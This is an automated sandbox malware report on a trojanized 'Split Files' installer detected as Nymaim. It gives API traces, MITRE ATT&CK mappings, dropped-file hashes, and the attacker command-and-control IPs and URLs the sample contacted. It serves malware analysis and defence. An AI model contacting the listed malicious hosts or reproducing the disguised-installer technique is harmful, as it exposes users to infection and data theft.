                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: GetLocaleInfoA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F7F3 cpuid
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D715CA0,SetNamedPipeHandleState,6DB87180,CloseHandle,CloseHandle,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CC0 GetVersionExA,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00453D18 GetUserNameA,

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation                		Path Interception1
                Access Token Manipulation                		2
                Masquerading                		1
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Input Capture                		Exfiltration Over Other Network Medium2
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts12
                Process Injection                		1
                Disable or Modify Tools                		LSASS Memory141
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		Exfiltration Over Bluetooth2
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Native API                		Logon Script (Windows)Logon Script (Windows)1
                Access Token Manipulation                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                Process Injection                		NTDS11
                Application Window Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer11
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items23
                Software Packing                		DCSync3
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem26
                System Information Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 778239 Sample: file.exe Startdate: 05/01/2023 Architecture: WINDOWS Score: 100 47 45.139.105.1 CMCSUS Italy 2->47 49 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->49 51 Snort IDS alert for network traffic 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 5 other signatures 2->57 10 file.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-EPSRP.tmp, PE32 10->31 dropped 13 is-EPSRP.tmp 13 30 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 3 other files (2 malicious) 13->39 dropped 16 SplitFiles131.exe 20 13->16         started        process8 dnsIp9 41 107.182.129.235, 49697, 80 META-ASUS Reserved 16->41 43 45.139.105.171, 49696, 80 CMCSUS Italy 16->43 45 171.22.30.106, 49698, 80 CMCSUS Germany 16->45 29 C:\Users\user\AppData\...\rf6CwnLa.exe, PE32 16->29 dropped 20 rf6CwnLa.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 59 Multi AV Scanner detection for dropped file 20->59 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Split Files\SplitFiles131.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe50%ReversingLabsWin32.Trojan.Generic

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                2.2.SplitFiles131.exe.10000000.5.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                0.0.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                1.2.is-EPSRP.tmp.400000.0.unpack100%AviraHEUR/AGEN.1248792Download File
                2.2.SplitFiles131.exe.400000.1.unpack100%AviraHEUR/AGEN.1250671Download File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.innosetup.com/0%URL Reputationsafe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte0%URL Reputationsafe
                http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                http://www.remobjects.com/?ps0%URL Reputationsafe
                http://www.innosetup.com0%URL Reputationsafe
                http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                http://107.182.129.235ibrary.php0%URL Reputationsafe
                http://171.22.30.106/library.php100%URL Reputationmalware
                http://www.remobjects.com/?psU0%URL Reputationsafe
                http://www.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://rus.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://www.innosetup.comDVarFileInfo$0%Avira URL Cloudsafe
                http://www.altarsoft.com/split_files.shtml2%VirustotalBrowse
                http://107.182.129.235/storage/extension.php813%VirustotalBrowse
                http://107.182.129.235/storage/extension.php8100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/extension.phptrue
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/ping.phptrue
                • URL Reputation: safe
                		unknown
                http://171.22.30.106/library.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drfalse
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/extension.php8SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpfalse
                • 13%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://www.altarsoft.com/split_files.shtmlis-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-2KTR4.tmp.1.dr, is-KJUD7.tmp.1.dr, is-8T8VP.tmp.1.dr, is-L90L4.tmp.1.dr, is-JPC2L.tmp.1.dr, is-4QNQO.tmp.1.dr, is-DPLT0.tmp.1.dr, is-2C8S0.tmp.1.dr, is-BOL01.tmp.1.dr, is-T2GFQ.tmp.1.drfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.remobjects.com/?psfile.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drfalse
                • URL Reputation: safe
                		unknown
                http://rus.altarsoft.com/split_files.shtmlis-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-MR54O.tmp.1.dr, is-IRLOP.tmp.1.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.innosetup.comfile.exefalse
                • URL Reputation: safe
                		unknown
                http://107.182.129.235ibrary.phpSplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.innosetup.comDVarFileInfo$file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377767344.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drfalse
                • Avira URL Cloud: safe
                		low
                http://www.remobjects.com/?psUfile.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.drfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                45.139.105.171
                		unknownItaly
                		33657CMCSUStrue
                45.139.105.1
                		unknownItaly
                		33657CMCSUStrue
                85.31.46.167
                		unknownGermany
                		43659CLOUDCOMPUTINGDEtrue
                107.182.129.235
                		unknownReserved
                		11070META-ASUStrue
                171.22.30.106
                		unknownGermany
                		33657CMCSUSfalse

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:778239
                Start date and time:2023-01-05 09:16:09 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 48s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@12/39@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 38.2% (good quality ratio 37.1%)
                • Quality average: 80.7%
                • Quality standard deviation: 25%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Not all processes where analyzed, report is missing behavior information
                • TCP Packets have been reduced to 100
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                09:17:06API Interceptor1x Sleep call for process: rf6CwnLa.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\Split Files\ReadMe - EN.txt (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..

                C:\Program Files (x86)\Split Files\ReadMe - RU.txt (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..

                C:\Program Files (x86)\Split Files\SplitFiles131.exe

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:modified
                Size (bytes):3299023
                Entropy (8bit):5.539173858681708
                Encrypted:false
                SSDEEP:98304:ipRn32Afxm8quBv68VsFryIBHB2+/sAO8:aBps+8
                MD5:D26C02425FA67FBDC0E4B4D5D6FA6088
                SHA1:09D22E65BFF61FB7BC43FB680D5E6EC3A942E9B0
                SHA-256:01CCE9B495FE88280525F44AA8A6A5417CC4081D0CC6CAD384CE42649673E677
                SHA-512:ED887FDFACAB2CAC118BE458B546E55CC473EF3DDA815EBAEBE5B01799F41976E80E03D649BCBA3D532C37CC05EDA3C34A1FF0841A3B3AD2F3935BB5B2189B38
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.........._...............................@..........................`.......~2..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...(......(.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Split Files\is-5V8K4.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

                C:\Program Files (x86)\Split Files\is-DPLT0.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..

                C:\Program Files (x86)\Split Files\is-JPC2L.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..

                C:\Program Files (x86)\Split Files\is-K6KAG.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:data
                Category:dropped
                Size (bytes):3299023
                Entropy (8bit):5.53917302973062
                Encrypted:false
                SSDEEP:98304:vpRn32Afxm8quBv68VsFryIBHB2+/sAO8:BBps+8
                MD5:2A4BCD07D4B6930C0F71167C15B0688B
                SHA1:5B07D7BED299AA5E483D5432483E21FB85DCA51F
                SHA-256:311DBADCEAF02ADAFE066C6221A9ECC92253F6C1980FC9AF16DC1514D6D77E6B
                SHA-512:43BC67CB935DA4CCD63773BB81490179150A65C18AF6E9B9E32BDD7A74904FD4D43FA8F095B0086B772225A6A3EEF5677C71FF64863557FC2F7E82EC2E5E0267
                Malicious:false
                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.........._...............................@..........................`.......~2..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...(......(.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Split Files\is-MR54O.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..

                C:\Program Files (x86)\Split Files\language\Arabic.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'

                C:\Program Files (x86)\Split Files\language\Chinese.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
